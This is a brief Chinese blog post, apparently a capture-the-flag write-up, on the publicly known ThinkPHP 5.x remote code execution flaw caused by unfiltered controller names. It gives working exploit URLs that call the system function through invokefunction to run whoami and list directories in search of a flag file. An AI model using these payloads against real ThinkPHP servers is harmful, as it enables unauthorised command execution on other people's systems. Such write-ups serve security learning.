记录一个thinkphp v5.x的漏洞
这是一个已经公开的thinkphp v5的漏洞利用
我们可以在 https://www.cnblogs.com/backlion/p/10106676.html 这里找到详细的资料
主要原因就是程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
这里有大佬的详细思路:https://www.cnblogs.com/backlion/p/10106676.html
知道了这些我们就可以构造出想要的语句
1.将url语句更改为
http://111.200.241.244:56473/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
(其中:s[1][]=(Linux指令))
2.接下来查找我们要找的flag文件
http://111.200.241.244:56473/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls/
http://111.200.241.244:56473/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls/flag
“You cannot improve your past, but you can improve your future. Once time is wasted, life is wasted.”

浙公网安备 33010602011771号